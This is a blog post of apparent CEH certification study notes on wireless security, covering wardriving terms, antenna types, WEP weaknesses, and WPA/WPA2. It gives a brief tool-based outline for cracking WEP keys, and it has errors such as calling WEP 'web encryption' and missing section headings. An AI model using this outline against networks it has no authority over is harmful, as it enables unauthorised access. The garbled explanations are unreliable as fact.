Certified Ethical Hacker - Part 14-1 - Hacking Wireless Networks

by Riazul H. Rozen
March 9, 2018 0 comments 3 minute read Certifications CEH
Download PDF

Wireless Area Network and the security hazards surrounding it

Wireless area networks is used worldwide by individuals and corporations alike. This wireless communication module is broadcasted across a radio, and is fitted in computers, smartphones, game consoles and so on, for the sole purpose of connecting to a network resource, or internet.There are varying types of wireless network connections, each designed with the purpose of creating easy communication between the end users and network resources.

Cracking WEP Keys

Some of these connections are -

  • LAN-to-LAN wireless network
  • 3G/4G Hotspot
  • Multiple Access Points
  • Addition to a wired network

The wireless area network is simple and very beneficial, as there is no need for connections through wires. The wireless module is also advantageous for remote areas. It is easier to get access to the internet in public places like airports, schools or restaurants. This increasing freedom is not met with its own challenges, as bandwidth reduces with increase in number of computers connected to the wireless network. Additionally, wireless networks are very prone to security attacks, some of which will be highlighted in this article.

There are different means to detect open wireless networks for exploitation, they are-

  • Warflying: Here, attackers use drones to determine open wireless networks.
  • WarChalking: this technique is used to draw symbols in public places, so users know there are open wireless networks in those areas
  • WarWalking: this is a process, where the attackers move around with wireless enabled devices, to detect open wireless networks.
  • WarDriving: Attackers move around with vehicles to determine which wireless networks are open.

The wireless networks can be broadcasted through antennas, to increase the bandwidth range. Attackers could also use these antennas as tools for gaining information and carrying out malicious functions. There are different types of antennas -

  • Omnidirectional Antenna: this device is used in wireless base stations, and it broadcasts and receives radio waves at a 360 degree angle.
  • Directional Antenna: these broadcasts radio waves in only one direction.
  • Yagi Antenna: this is a one directional antenna, used for frequency bands of 10MHz to VHF and UHF.
  • Dipole Antenna: this antenna moves in two directions, and is used to lend a hand to client connections.
  • Parabolic Grid Antenna: These kinds of antennas can detect Wi-Fi signals at a distance of about ten miles. The parabolic gird antenna is used by attackers to gain access to better signal quality, ultimately gaining more data to steal, high power output for man-in-the-middle attacks, as well as extra bandwidth to maliciously tamper with.

The wireless network is usually protected with encryption tools, to ensure the protection of information as well as privacy during wireless transmissions.

There are various types of wireless encryptions, such as -


The web encryption system provides privacy during transportation of data from one point to the other using the wireless network system. While this system is known for its age and originality in wireless encryption, it is riddled with numerous flaws and vulnerabilities.

This method is weak for various reasons, some of which include a non-defined device for transmitting encryption keys, security loopholes in associate and disassociate messages, as there is no provision for validation, a small sized IV, susceptibility to attacks based on reusing keys, due to a short IV and hence the need for the protection system to reuse keys after short periods and lastly, there is a high probability of the IV sequence being developed more than one, especially when wireless adapters are designed by the same vendor.

How to determine Weak Initialization Vectors (IV)

Weak IVs are detrimental to encryption methods, as they create an easy system for attack. These weak IVs not only show the attacker the origination points i.e key byte origin, they also provide the attacker with the means to reveal the bytes of the base key. The steps below are used to determine which IVs are weak -

  • The IV is designed with respect to a base key, in the RC4 algorithm
  • A short IV that is vulnerable to key reuse and message replay.
  • Inability to detect when messages have been tampered with.

How To Crack a WEP system

Determine the ability of the injection of the wireless device with respect to the access point. Sniff with tools like Cain and Abel to retrieve original IVs Extract the encryption keys with tools like Cain and Abel Open the wireless in monitor mode and use tools like aireplay-ing to falsify authentication. Inject packets with tools like aireplay-ing in ARP mode.


This is another encryption module, designed for wireless local area networks and based on 802.11 standards. This encryption method is stronger that it’s web encryption privacy counterparts, and provides data security by requesting for PSK or EAP authentication.

This method works with TKIP, which uses the RC4 stream cipher encryption with 128-bit keys and 64-bit MIC integrity check. This method is one step ahead of WEP, as it takes care of flaws by increasing the size of the IV as well as using mixing functions.

TKIP uses temporal keys, programmed to change after every 10,000 packets, hence providing security against cryptanalytic attacks designed for reusing keys.

It is important to note that these temporal keys are gotten from the PMK which is gotten from the EAP authentication. This is noted as the four-way handshake.


This is designed for corporation bodies and wireless network users, and is fitted with a stronger security measure with regards to data and access control. As stated in the afore mentioned statement, there are two types of WPA2:

For personal use: this has a pre-shared key, as a protective measure against illegitimate access. This PSK is used an encryption method for each wireless device, encoding network traffic with a 128-bit key, gotten from a passphrase of8-63 ASCII characters.

For enterprise: this uses an EAP or a radius, to allow for central validation through numerous methods, from token cards to certificates. The authentication method is passed, by providing login details generated from the central server.

Published with the express permission of the author.